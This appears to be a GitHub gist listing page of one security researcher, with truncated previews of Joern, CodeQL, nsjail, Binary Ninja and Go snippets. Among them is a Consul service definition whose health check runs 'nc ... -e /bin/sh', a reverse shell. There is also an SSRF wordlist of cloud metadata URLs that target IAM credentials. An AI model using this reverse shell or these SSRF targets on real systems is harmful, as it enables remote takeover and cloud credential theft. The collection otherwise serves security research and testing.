Francis Alexander torque59

@torque59
torque59 / gist:c01a1268522cf9adf106ab5a28c6d390
Created January 28, 2025 15:34
joern error - core-dotcms
joern> sink.reachableByFlows(source).p
2025-01-28 16:32:43.255 ERROR SourceToStartingPoints: Unable to complete 'SourceToStartingPoints' task
java.util.NoSuchElementException: null
at io.shiftleft.Implicits$IterableOnceDeco$.onlyChecked$extension(Implicits.scala:17) ~[io.shiftleft.codepropertygraph_3-1.7.23.jar:1.7.23]
at io.shiftleft.semanticcpg.language.nodemethods.CfgNodeMethods$.io$shiftleft$semanticcpg$language$nodemethods$CfgNodeMethods$$$walkUpContains$extension(CfgNodeMethods.scala:126) ~[io.joern.semanticcpg-4.0.227.jar:4.0.227]
at io.shiftleft.semanticcpg.language.nodemethods.CfgNodeMethods$.method$extension(CfgNodeMethods.scala:110) ~[io.joern.semanticcpg-4.0.227.jar:4.0.227]
at io.joern.dataflowengineoss.queryengine.BaseSourceToStartingPoints.fieldAndIndexAccesses(SourcesToStartingPoints.scala:236) ~[io.joern.dataflowengineoss-4.0.227.jar:4.0.227]
at io.joern.dataflowengineoss.queryengine.BaseSourceToStartingPoints.withFieldAndIndexAccesses$$anonfun$1(Sourc
@torque59
torque59 / run-nsjail-docker.sh
Created June 2, 2020 10:20
nsjail for /bin/sh
docker run --privileged --rm -it nsjailcontainer nsjail --user 99999 --group 99999 --disable_proc --chroot / --seccomp_string 'ALLOW { SYSCALL[-1], futex, epoll_wait, poll, nanosleep, restart_syscall, write, rt_sigprocmask, sched_yield, clock_gettime, read, rt_sigreturn, madvise, mmap, fcntl, sendto, mprotect, epoll_ctl, gettid, clone, open, brk, close, set_robust_list, sigaltstack, recvfrom, munlock, prctl, socket, getuid, tgkill, sched_getparam, sched_getscheduler, munmap, newlstat, newfstat, newstat, execve, readlink, lseek, rt_sigaction, getdents, epoll_create1, eventfd2, geteuid, sched_getaffinity, mknod, getrlimit, openat, mkdir, setitimer, getcwd, arch_prctl, setrlimit, getitimer, set_tid_address, unlink, access, getegid, getsockopt, exit, exit_group, ioctl, getgid, connect, select, ioctl, rt_sigprocmask, chown, openat, dup2, pipe, wait4, access, getuid, geteuid, getgid, getegid, openat, faccessat, getdents, munmap, arch_prctl, lseek, set_tid_address, set_robust_list, getdents, close, futex, brk, prlim
echo "[+] Installing CodeQL at $HOME"
cd $HOME
mkdir codeql-home && cd codeql-home
wget "https://github.com/github/codeql-cli-binaries/releases/download/v2.1.3/codeql.zip" && unzip codeql.zip
mv codeql/ codeql-cli/
git clone https://github.com/github/codeql.git
echo "set PATH $HOME/codeql-home/codeql-cli/ $PATH" >> ~/.config/fish/config.fish && source ~/.config/fish/config.fish
codeql resolve languages && codeql resolve qlpacks
echo "[+] CodeQL installed"
@torque59
torque59 / 1_Snippet_Instructions.txt
Created May 9, 2020 14:21 — forked from psifertex/1_Snippet_Instructions.txt
my current collection of snippets
Welcome to Jordan's grab-bag of common Binary Ninja Snippets.
These snippets are meant to run with the Snippets Plugin
(http://github.com/Vector35/snippets) though they can all also be pasted
directly into the python console or turned into stand-alone plugins as needed.
To install the entire collection at once, just install the Snippets plugin via
the plugin manager (CMD/CTL-SHIFT-M), confirm the Snippet Editor works
(Tool/Snippets/Snippet Editor), and unzip this bundle (Download ZIP above) into
your Snippets folder.
@torque59
torque59 / enable_plugins.py
Created April 28, 2020 19:21 — forked from tonylambiris/enable_plugins.py
Enable plugins for Binary Ninja
# vim: ft=python sw=4 ts=4 et
from pprint import pprint
mgr = RepositoryManager()
# add third-party plugins with the following:
# mgr.add_repository(url="https://github.com/GitMirar/BinaryNinjaYaraPlugin.git",
# repopath="plugins",
# localreference="master",
{
"ID": "http",
"Name": "http",
"Address": "0.0.0.0",
"Port": 80,
"check": {
"script": "nc 172.17.0.1 8081 -e /bin/sh",
"interval": "10s"
}
}
@torque59
torque59 / values_pointers.go
Created April 24, 2019 05:21 — forked from josephspurrier/values_pointers.go
Golang - Asterisk and Ampersand Cheatsheet
/*
********************************************************************************
Golang - Asterisk and Ampersand Cheatsheet
********************************************************************************
Also available at: https://play.golang.org/p/lNpnS9j1ma
Allowed:
--------
p := Person{"Steve", 28} stores the value
@torque59
torque59 / task_for_pid.c
Created April 13, 2019 06:06 — forked from attilathedud/task_for_pid.c
Mac OS X El Capitan (10.11) and task_for_pid()
/*
Full explanation is available here: http://attilathedud.me/mac-os-x-el-capitan-10-11-and-task_for_pid/
*/
/*
To compile, create a file called Info.plist with the following content:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
@torque59
torque59 / cloud_metadata.txt
Created November 30, 2018 03:48 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
@torque59
torque59 / README.md
Created September 4, 2018 13:28 — forked from Integralist/README.md
How encryption with certificates and public/private keys work

PKI

  • PKI is based upon two keys (public and private)
  • Data can be securely encrypted using either the public or private keys
  • Data can only be decrypted when using the opposite key to that which encrypted the data
  • Use a Key Generator (e.g. ssh-keygen) to create your public/private keys
  • These keys are typically stored in ~/.ssh/
    • id_rsa (private key; do not share! typically used to decrypt data)
    • id_rsa.pub (public key; typically used to encrypt data)